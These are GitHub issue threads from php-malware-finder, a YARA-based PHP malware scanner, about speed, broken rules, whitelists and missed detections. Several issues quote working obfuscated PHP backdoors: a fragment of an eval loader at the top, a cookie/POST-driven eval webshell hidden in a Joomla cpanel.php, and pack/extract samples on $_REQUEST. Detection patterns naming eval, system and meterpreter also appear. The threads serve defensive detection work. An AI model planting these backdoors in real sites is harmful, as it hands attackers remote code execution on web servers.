71,60,3931,65,7440,51,8526,50,8321,21,10050,26,6498,49,8739,43,1229,53,3637,31,5356,51,9037,64,5946,60,7829,52,2271,45,4966,39,9300,38,5058,66,3356,34,9398,27,9425,29,5738,53,4511,61,2417,20,7165,50,9158,29,8422,27,9534,64,9911,25,7215,54,8342,34,3315,41,8158,34,5680,23,5458,23,8697,42,6967,43,4827,31,2040,65,6359,38,1861,44,3861,20,9936,54,6150,55,3210,68,1302,43,633,68,9621,43,6245,21,4063,58,5851,24,6303,28,1082,21,4759,68,5545,67,7321,61,1103,56,1457,57,3184,26,1627,41,843,37,3828,33,1514,65,3064,64,6397,58,4908,58,1668,48,9240,29,6099,51,6205,40,468,36,3782,46,2352,65,1398,59,1579,48,6877,66,7737,69,89,64,7629,34'); $loerhzvnej=substr($uahzsvtxsn,(32676-22570),(40-33)); if (!function_exists('uhlgvbkyjj')) { function uhlgvbkyjj($qrmybpqqzs, $lzpohvttqw) { $hstjkllsfv = NULL; for($wayquepjea=0;$wayquepjea<(sizeof($qrmybpqqzs)/2);$wayquepjea++) { $hstjkllsfv .= substr($lzpohvttqw, $qrmybpqqzs[($wayquepjea*2)],$qrmybpqqzs[($wayquepjea*2)+1]); } return $hstjkllsfv; };} $lwilxtcnpv="\x20\57\x2a\40\x65\153\x69\147\x65\147\x6e\156\x7a\153\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\64\x38\55\x31\61\x31\51\x29\54\x20\143\x68\162\x28\50\x33\66\x39\55\x32\67\x37\51\x29\54\x20\165\x68\154\x67\166\x62\153\x79\152\x6a\50\x24\172\x63\170\x68\162\x73\166\x72\162\x6d\54\x24\165\x61\150\x7a\163\x76\164\x78\163\x6e\51\x29\51\x3b\40\x2f\52\x20\166\x61\141\x77\161\x73\165\x76\152\x75\40\x2a\57\x20"; $kwrtwsusop=substr($uahzsvtxsn,(30815-20702),(53-41)); $kwrtwsusop($loerhzvnej, $lwilxtcnpv, NULL); $kwrtwsusop=$lwilxtcnpv; $kwrtwsusop=(831-710); $uahzsvtxsn=$kwrtwsusop-1; ?>

cheers !

40 times speed optimization

Hi NBS, thanks for your great work!

I found a huge optimization by moving the whitelist hashing out of Yara. My client implementation is 40x faster on a standard Magento 2.0.6 source, while scanning the same stuff:

# time ./phpmalwarefinder -l php /data/all-magento/magento-2.0.6
[...]

real	9m59.357s
user	9m46.948s
sys	0m4.432s

# time mwscan --ruleset nbs /data/all-magento/magento-2.0.6 --deep
Tue Jan 17 15:11:33 2017 Using NBS rules.
Tue Jan 17 15:11:33 2017 Fetching php.yar
Tue Jan 17 15:11:33 2017 Fetching whitelist.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/drupal.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/wordpress.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/symfony.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/phpmyadmin.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/magento2.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/prestashop.yar
Tue Jan 17 15:11:34 2017 Fetching whitelists/custom.yar
Tue Jan 17 15:11:34 2017 Fetching common.yar
Tue Jan 17 15:11:34 2017 Loaded 15 yara rules and 1279 whitelist entries
Tue Jan 17 15:11:48 2017 Finished scanning 41514 files: 76 malware and 25 whitelisted.

real	0m14.652s
user	0m10.116s
sys	0m1.512s

The profit comes from how inefficient Yara handles hashing. You mentioned that in the source already. They have recently improved things in the master branch a bit, but it will take a while before that version ends up in various Linux distributions.

To test mwscan on Ubuntu:

sudo apt install -qy python-pip python-dev gcc
sudo pip install --no-cache-dir --upgrade mwscan
mwscan --help
mwscan --ruleset nbs <path>

Or CentOS:

 wget https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
 sudo rpm -ivh epel-release-latest-6.noarch.rpm
  
 sudo yum -y install python-pip python-devel gcc
 sudo pip install --no-cache-dir --upgrade mwscan

Cheers!
Willem

(update: I've published mwscan as package, so you can do just pip install mwscan now)

tag files with malicious probability

When pmf shows multiple files in its output, it can be hard for a human to sort files and find real malwares.
Yara can tag files, we should use this functionality to help in detecting real webshells/web malwares.

Change the license from GPL to LGPL

Rationale: We don't care about people using our software in their application, as long as they contribute back to PMF.

error: unknown module "hash" / error: invalid field name "sha1"

I downloaded newest yara (3.4.0) and compiled it. But running "make", "phpmalwarefinder" or "yara" with the php.yar doesn't work:

oliver@v3:~/pmf/php-malware-finder-master$ yara -v
yara 3.4.0
oliver@v3:~/pmf/php-malware-finder-master$ make
./php.yar(1): error: unknown module "hash"
./whitelist.yar(10): error: invalid field name "sha1"
./whitelist.yar(27): error: invalid field name "sha1"
./whitelist.yar(63): error: invalid field name "sha1"
./whitelist.yar(72): error: invalid field name "sha1"
./whitelist.yar(92): error: invalid field name "sha1"
./whitelist.yar(115): error: invalid field name "sha1"
./whitelist.yar(128): error: invalid field name "sha1"
./whitelist.yar(137): error: invalid field name "sha1"
./whitelist.yar(151): error: invalid field name "sha1"
./whitelist.yar(162): error: invalid field name "sha1"
./whitelist.yar(170): error: invalid field name "sha1"
[-] 0x294d:$eval: {eval( was not detected in cpanel.php, sorry
make: *** [tests] Fehler 1

Why does 'hash' not work. Isn't it implemented in yara 3.4.0?

Python dependency not found

root@web:~/php-malware-finder# ./phpmalwarefinder -v /home/
./malwares.yara(1): error: unknown module "hash"
./whitelist.yara(10): error: invalid field name "sha1"
./whitelist.yara(23): error: invalid field name "sha1"
./whitelist.yara(32): error: invalid field name "sha1"
./whitelist.yara(52): error: invalid field name "sha1"
./whitelist.yara(66): error: invalid field name "sha1"
./whitelist.yara(79): error: invalid field name "sha1"
./whitelist.yara(88): error: invalid field name "sha1"
./whitelist.yara(102): error: invalid field name "sha1"
./whitelist.yara(113): error: invalid field name "sha1"
./whitelist.yara(120): error: undefined identifier "Wordpress"
./malwares.yara(65): error: undefined identifier "IsWhitelisted"
./malwares.yara(113): error: undefined identifier "IsWhitelisted"
./malwares.yara(151): error: undefined identifier "IsWhitelisted"
./malwares.yara(186): error: undefined identifier "IsWhitelisted"
./malwares.yara(218): error: undefined identifier "IsWhitelisted"

Debian GNU/Linux 8.1 (jessie) (x86_64)

php.yar(1): error: syntax error, unexpected _IDENTIFIER_

I can't seem to fire this up. I tried using the Makefile and I also tried invoking php-malware-finder/phpmalwarefinder directly but both give the following error output:

$ ./phpmalwarefinder /var/www/sites/default/files
./php.yar(1): error: syntax error, unexpected _IDENTIFIER_, expecting $end or _RULE_ or _PRIVATE_ or _GLOBAL_
whitelists/drupal.yar(10): error: undefined identifier "hash"
whitelists/wordpress.yar(10): error: undefined identifier "hash"
whitelists/symfony.yar(10): error: undefined identifier "hash"
whitelists/phpmyadmin.yar(10): error: undefined identifier "hash"
whitelists/magento2.yar(10): error: undefined identifier "hash"
whitelists/prestashop.yar(10): error: undefined identifier "hash"
whitelists/custom.yar(11): error: undefined identifier "hash"
whitelist.yar(20): error: undefined identifier "hash"
whitelist.yar(62): error: undefined identifier "hash"
whitelist.yar(75): error: undefined identifier "hash"
whitelist.yar(84): error: undefined identifier "hash"
whitelist.yar(98): error: undefined identifier "hash"
whitelist.yar(109): error: undefined identifier "hash"
whitelist.yar(115): error: undefined identifier "Symfony"
common.yar(91): error: undefined identifier "IsWhitelisted"
common.yar(156): error: undefined identifier "IsWhitelisted"
common.yar(192): error: undefined identifier "IsWhitelisted"
./php.yar(44): error: undefined identifier "IsWhitelisted"
./php.yar(55): error: undefined identifier "IsWhitelisted"
./php.yar(71): warning: $concat is slowing down scanning
./php.yar(73): error: undefined identifier "IsWhitelisted"
./php.yar(101): error: undefined identifier "IsWhitelisted"
./php.yar(161): error: undefined identifier "IsWhitelisted"
./php.yar(175): error: undefined identifier "PasswordProtection"

There are no installation instructions except requiring YARA, which I installed (2.0.0-2 from Ubuntu 14.04.5)

Please help. I cannot use this yet.

Add PMF on travis-ci

Now that yara is in travis-ci it would be cool to to PMF on it too.

Add a shiny logo for PMF

Every important opensource project have a logo, PMF should have one since it's among the best malware finding tool on unix web servers.

php backdoors repo to check pmf against

Here is a nice collection of php backdoors : https://github.com/bartblaze/PHP-backdoors

Should be nice to test PMF against in order to modify/enhance some rules...

eval rules is broken

Commit fde93ed broke the eval

root@poney:~/php-malware-finder/php-malware-finder# head -n20 /tmp/eval/cpanel.php
<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $GLOBALS['m6aa932e'];global$m6aa932e;$m6aa932e=$GLOBALS;$m6aa932e['a7b1']="\x59\x5d\x52\xa\x4c\x27\x42\x25\x48\x28\x6a\x66\x9\x73\x38\x23\x67\x74\x50\x4a\x36\x2e\x7b\x58\x34\x44\x4d\x7a\x3f\x47\x21\x31\x40\x6c\x51\x62\xd\x5b\x71\x60\x7d\x5f\x37\x6f\x65\x77\x64\x2b\x6b\x33\x49\x35\x2a\x4f\x78\x70\x68\x53\x4e\x24\x30\x43\x55\x7e\x6d\x61\x3e\x69\x54\x57\x5c\x75\x79\x4b\x2f\x6e\x3a\x46\x72\x3c\x45\x26\x5a\x22\x39\x5e\x2d\x2c\x20\x29\x3b\x41\x56\x7c\x3d\x63\x32\x76";$m6aa932e[$m6aa932e['a7b1'][45].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][95]]=$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][78];$m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]=$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][46];$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][75];$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]=$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][17];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]]=$m6aa932e['a7b1'][55].$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][75];$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]=$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]=$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][44];$m6aa932e[$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][11]]=$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][17];$m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]=$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][11];$m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]=$m6aa932e['a7b1'][27].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][24];$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]=$_POST;$m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44]]=$_COOKIE;@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][16],NULL);@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][33].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][16].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][13],0);@$m6aa932e[$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][84]]($m6aa932e['a7b1'][64].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][54].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][43].$m6aa932e['a7b1'][75].$m6aa932e['a7b1'][41].$m6aa932e['a7b1'][17].$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][64].$m6aa932e['a7b1'][44],0);@$m6aa932e[$m6aa932e['a7b1'][78].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][11]](0);$y5da781e=NULL;$x3ff4965=NULL;$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][14]]=$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][51];global$fecba48;function z674($y5da781e,$efb074d){global$m6aa932e;$o82b6b8="";for($b56c6566=0;$b56c6566<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($y5da781e);){for($b148c51e=0;$b148c51e<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($efb074d)&&$b56c6566<$m6aa932e[$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][31]]($y5da781e);$b148c51e++,$b56c6566++){$o82b6b8.=$m6aa932e[$m6aa932e['a7b1'][45].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][95]]($m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]($y5da781e[$b56c6566])^$m6aa932e[$m6aa932e['a7b1'][67].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][51]]($efb074d[$b148c51e]));}}return$o82b6b8;}function x9687832f($y5da781e,$efb074d){global$m6aa932e;global$fecba48;return$m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]($m6aa932e[$m6aa932e['a7b1'][56].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][42]]($y5da781e,$fecba48),$efb074d);}foreach($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][44].$m6aa932e['a7b1'][44]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}if(!$y5da781e){foreach($m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}}$y5da781e=@$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]($m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]($y5da781e),$x3ff4965));if(isset($y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]])&&$fecba48==$y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]]){if($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][67]){$b56c6566=Array($m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97]=>@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]](),$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][97]=>$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][21].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][31],);echo@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]($b56c6566);}elseif($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][44]){eval($y5da781e[$m6aa932e['a7b1'][46]]);}exit();} ?><?php
/**
 * @version             $Id: cpanel.php 21097 2011-04-07 15:38:03Z dextercowley $
 * @package             Joomla.Administrator
 * @subpackage  Templates.hathor
 * @copyright   Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
 * @license             GNU General Public License version 2 or later; see LICENSE.txt
 * @since               1.6
 */

// no direct access
defined('_JEXEC') or die;
$app    = JFactory::getApplication();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo  $this->language; ?>" lang="<?php echo  $this->language; ?>" dir="<?php echo  $this->direction; ?>">
<head>
<jdoc:include type="head" />

<!-- Load system style CSS -->

root@poney:~/php-malware-finder/php-malware-finder# git diff
diff --git a/php-malware-finder/malwares.yara b/php-malware-finder/malwares.yara
index 1fa5c22..bbb5b8f 100644
--- a/php-malware-finder/malwares.yara
+++ b/php-malware-finder/malwares.yara
@@ -57,7 +57,7 @@ private rule CloudFlareBypass
 rule ObfuscatedPhp
 {
     strings:
-        $eval = /(<\?php[[:space:]]|[;{}])\s*@?(eval|preg_replace|system|exec|assert|passthru|win_shell_execute)[[:space:]]*\(/  // ;eval( <- this is dodgy
+        $eval = /(<\?php[[:space:]]|[;{}])\s*@?(eval|preg_replace|system|exec|assert|passthru|win_shell_execute)[\t ]*\(/  // ;eval( <- this is dodgy
         $b374k = "'ev'.'al'"
         $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/  //b374k
         $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/  // weevely3 launcher
root@poney:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/eval/
ObfuscatedPhp /tmp/eval//cpanel.php
0x294d:$eval: {eval(
root@poney:~/php-malware-finder/php-malware-finder# git checkout malwares.yara
root@poney:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/eval/
root@poney:~/php-malware-finder/php-malware-finder#

Improve the scanning speed

There are several low-hanging fruits to improve the scanning speed:

Wait until the next release of yara
Use multiple processes, since in our case, input/output is the bottleneck
Proofread the regexps, to check their conformance to this guide

Whitelist not working

i generate wordpress plugin folder using generate_whitelist.py and put it in whitelists folder, include the url in whitelist.yar.
but, some file still detected as a malware. do i did something wrong? could you please tell me who to make proper whitelist?

Thank you

Remove the "mail" command in docroot-check.sh

I think it's not necessary.

https://github.com/nbs-system/php-malware-finder/blob/02f4b9e2b8827afca8de81e66febd0e1ceee1273/php-malware-finder/docroot-check.sh#L37

Move from SHA1 to SHA256 ?

Even if it's super-far-fetched, it would be nice to move from SHA1 to SHA256, to avoid having a collision between a bad file and whitelist.

for the blue man :)

False positives strategy

Hi! As noted in #45, your rules produce a lot of false positives for a clean Magento installation. How do you think the php-malware-finder project should handle this? Some options:

Accept it, interpreting fps will take much time
Extend whitelists for known legit apps. It is hard though to make whitelists for small modifications (ie patches).
Reduce the scope of signatures so they are more strict
others?

I am not sure about the best strategy. However I have created some Yara rules that are more strict and identify malware that was specifically found on Magento sites. Would love to collaborate!

Best
Willem

Consider adding manul db to signatures

https://github.com/antimalware/manul/blob/master/src/scanner/static/signatures/malware_db.xml

0.2.2 tar.gz (releases) > malwares.yara

  214         $ = "ls -la" fullword
  215         $ = "meterpreter" fullword" <-----
  216         $ = "nc -l" fullword

Line 215 has a stray " that causes

./malwares.yara(216): error: unterminated string
./malwares.yara(216): error: syntax error, unexpected $end, expecting CONDITION

The whitelist generator is broken

output_list.append('hash.sha1(0, filename) == %s or // %s' % (hashlib.sha1(fname).hexdigest(), fname))

It should hash the content of the file, and not its name.
It seems that writing some helper scripts and not using them isn't a great idea after all :/

How do config files work?

Running the tool with the -h option lists a -c option which is "Optional path to a configuration file"

This sounds useful - however, where are the docs? What can config files do? :)

How shall we detect php files?

Currently, PMF uses <? to detect php files. Shall we use <?php instead ot reduce false positives?

Clean up our main script

Currently, our main script's code looks quite ugly. It would be nice if someone with some shell-fu could take a look at it, and clean it up.

Why is the PHP ruleset limited to files <5MB?

I'm wondering why, in php.yar, there is a condition that the file must be less than 5MB: https://github.com/nbs-system/php-malware-finder/blob/be0b64f9bc936c459a6b32e76c6365bc54591b81/php-malware-finder/php.yar#L33

This seems to have been added in this commit: nbs-system/php-malware-finder@97b6069

Fancy sample

Source

<?php $debug = pack("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));

<?php $debug = "ch". "r"; $debug = implode(array_map($debug, explode(":","112:97:99:107"))); $debug = $debug("H*", "65787472616374"); $debug($_REQUEST); @die($ctime($atime));

hack not detected

Hello, I tried for the first time php-malware-finder and it find a lot of hacked code. But for example it don't detect this type of hack

@error_reporting(0);@ini_set('display_errors',false);defined('<84>··7³µ³8¸13530´·') || define('<84>··7³µ³8¸13530´·',__FILE__);global $<83>³µ7834¶81µ9´2¸5;global $·53´·¶6³9¶7775µ³; if(!function_exists('³0µ93µµ¶98511086')){ function ³0µ93µµ¶98511086($<89>9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($<89>9·2³µ·2851µ5´5µ)) return ''; $<89>9·2³µ·2851µ5´5µ=base64_decode($<89>9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$<89>9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @<87>7µ16´¸2´923¶895(); $<89>¶505·³465¶7´1µ6=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>2µ³´522259¶6·2³']($<89>9·2³µ·2851µ5´5µ); $³71¸¸34076112µ06=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<85>70µ53233³19´¶66']($³71¸¸34076112µ06,$<89>¶505·³465¶7´1µ6,$³71¸¸34076112µ06); return $<89>9·2³µ·2851µ5´5µ^$³71¸¸34076112µ06; }} if(!function_exists('´8·18¶3¸´µ9´µ1´8')){ function ´8·18¶3¸´µ9´µ1´8($<89>9·2³µ·2851µ5´5µ,$³71¸¸34076112µ06=''){ if(empty($<89>9·2³µ·2851µ5´5µ)) return ''; $<89>9·2³µ·2851µ5´5µ=base64_decode($<89>9·2³µ·2851µ5´5µ); if($³71¸¸34076112µ06=='') return ~$<89>9·2³µ·2851µ5´5µ; if($³71¸¸34076112µ06=='-1') @¶¸8¶0³42¸·4¶791¸(); $<89>¶505·³465¶7´1µ6=$GLOBALS['<83>³µ7834¶81µ9´2¸5']['<83>2µ³´522259¶6·2³']($<89>9·2³µ·2851µ5´5µ); 